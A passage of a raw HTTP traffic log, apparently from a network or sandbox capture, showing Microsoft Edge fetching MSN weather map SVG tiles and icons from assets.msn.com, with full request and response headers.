server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 49d18988-a01e-00cc-66aa-1c49c3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 3656
akamai-request-bc: [a=88.221.24.111,b=431554795,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=36, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b900eb
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310020.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310020.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: MuUNIgU7Wmjip76Z1AMI3g==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C3425BE0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4d524bd6-501e-005e-47aa-1ccd15000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 3654
akamai-request-bc: [a=88.221.24.111,b=431555167,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9025f
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310044.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310044.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: Ob6Gnk8SrzhmVvvQ3EUEVA==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C35A262C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 448b400f-601e-0027-0baa-1c3131000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 3794
akamai-request-bc: [a=88.221.24.111,b=431555184,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90270
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310108.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310108.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: iORXwmQpSEYY0/tIuRj4WQ==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C35A262C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d80051e7-401e-0042-7aaa-1c9f75000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 4487
akamai-request-bc: [a=88.221.24.111,b=431555191,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=23, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90277
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310132.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_20_6_202212310132.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: ryXfJ1BX0MxSFR6NXBz7Ow==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C3A61838
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 28d03ebe-001e-00d5-0daa-1cc978000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:05 GMT
content-length: 4053
akamai-request-bc: [a=88.221.24.111,b=431555282,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b902d2
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /weathermapdata/1/static/svg/72/v6/card/LightRainV3.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: M+oCUvo7vg5ORpidHQXauQ==
last-modified: Tue, 01 Nov 2022 05:13:30 GMT
etag: 0x8DABBC7D13A40E3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4c436c14-701e-005f-0803-f037b2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
content-length: 988
expires: Fri, 27 Jan 2023 04:13:19 GMT
date: Sat, 31 Dec 2022 00:06:05 GMT
akamai-request-bc: [a=88.221.24.111,b=431556369,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90711
cache-control: public, max-age=2592000
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /weathermapdata/1/static/weather/Icons/taskbar//Alert_WI_Y.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: nENKvypoRG7ELvhwqyCb0Q==
last-modified: Thu, 08 Dec 2022 08:40:22 GMT
etag: 0x8DAD8F7D8635688
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 1d6096ff-101e-00e6-31cd-0e96d3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
content-length: 1545
expires: Thu, 12 Jan 2023 08:30:25 GMT
date: Sat, 31 Dec 2022 00:06:06 GMT
akamai-request-bc: [a=88.221.24.111,b=431556540,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b907bc
cache-control: public, max-age=2592000
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212302356.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212302356.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: ImRUTYj/f8C+2hmux2F9wg==
last-modified: Fri, 30 Dec 2022 23:58:36 GMT
etag: 0x8DAEAC1C3E53AD8
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: cdb8c290-601e-00fc-6aaa-1cf70c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 20054
akamai-request-bc: [a=88.221.24.111,b=431556571,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b907db
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212302356.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212302356.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: Eu1PnJ0/QCIXtzT0Nd/ieQ==
last-modified: Fri, 30 Dec 2022 23:58:36 GMT
etag: 0x8DAEAC1C3DB2A33
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: b16aab16-101e-00ab-54aa-1c593f000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 11272
akamai-request-bc: [a=88.221.24.111,b=431556730,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9087a
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310020.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310020.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: 3S9IlDWTlGLp0FnB3V1Yyw==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C3A8AFE4
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 679e6107-701e-0066-32aa-1c69d5000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 14099
akamai-request-bc: [a=88.221.24.111,b=431556784,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b908b0
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310020.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/33_21_6_202212310020.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: j1qtMlMv2ZUUTp4xDfb5Iw==
last-modified: Fri, 30 Dec 2022 23:58:35 GMT
etag: 0x8DAEAC1C365BD3B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a81423b4-401e-0030-35aa-1c983a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 9270
akamai-request-bc: [a=88.221.24.111,b=431557210,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b90a5a
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310044.svgmsedge.exeRemote address:88.221.24.115:443RequestGET /weathermapdata/1/nowcastmap/202212302356/Sbn/6/32_21_6_202212310044.svg HTTP/2.0
host: assets.msn.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: USRLOC=
cookie: _EDGE_S=F=1
cookie: _EDGE_V=1
cookie: MUID=0B196D17FEC56BBC00017F9CFFCD6AE0
cookie: OptanonConsent=isGpcEnabled=0&datestamp=Sat+Dec+31+2022+01%3A05%3A51+GMT%2B0000+(Coordinated+Universal+Time)&version=6.25.0&isIABGlobal=false&hosts=&consentId=7e7a2217-cd3d-44e8-ba47-f3d69c2ac4a5&interactionCount=0&landingPath=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-US%26title%3DNew%2520tab%26fre%3D1%26dsp%3D1%26sp%3DBing%26prerender%3D1%26firstlaunch%3D1&groups=C0001%3A1%2CC0002%3A0%2CC0003%3A0%2CC0004%3A0%2CSTACK42%3A0
cookie: _SS=SID=00
ResponseHTTP/2.0 200
content-md5: fzjSsBmyPQRgO9Q7U+oGtQ==
last-modified: Fri, 30 Dec 2022 23:58:34 GMT
etag: 0x8DAEAC1C3024F00
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8efeed05-001e-0088-6daa-1cc3fc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Last-Modified,ETag,Content-MD5,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
access-control-allow-origin: *
content-encoding: gzip
cache-control: max-age=3600
date: Sat, 31 Dec 2022 00:06:06 GMT
content-length: 12593
